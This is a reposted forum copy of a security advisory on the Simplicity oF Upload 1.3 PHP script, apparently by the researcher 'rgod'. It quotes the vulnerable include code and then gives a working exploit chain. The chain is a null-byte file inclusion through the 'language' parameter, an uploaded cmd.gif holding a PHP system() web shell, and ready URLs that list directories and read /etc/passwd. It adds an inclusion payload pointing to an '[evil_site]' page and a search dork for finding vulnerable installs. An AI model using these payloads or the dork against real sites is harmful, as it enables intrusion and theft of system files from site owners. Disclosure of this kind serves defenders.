[转载]Simplicity OF Upload 1.3远程代码执行及跨站脚本漏洞分析
信息来源:[url]http://www.phpsimplicity.com/scripts.php?id=3[/url]remote commands execution:
problem at line 25-30:
...
//check for language overriding..
if (isset($_GET['language']))
$language = strtolower($_GET['language']);
//now we include the language file
require_once("$language.lng");
...
you can include whatever adding a null byte to "language" parameter value:
example:
[url]http://localhost:30/simply/download.php?language=upload.php%00[/url]
you will see upload & download page together :)
so you can upload a cmd.gif (when you upload a .php file, usually it is
renamed to .html...) file with this php code inside to execute
commands:
<?php
system($HTTP_GET_VARS[command]);
?>
then try this url:
http://[target]/[path]/download.php?language=cmd.gif%00&command=ls
to list directories
http://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwd
to show /etc/passwd file
cross site scripting:
also, a remote user can supply a specially crafted URL to redirect other people
to an evil page:
http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00
googledork:
"Powered By: Simplicity oF Upload"
rgod
email: rgod[at]autistici.org
site: [url]http://rgod.altervista.org[/url]
original advisory: [url]http://rgod.altervista.org/simply.html[/url]
页:
[1]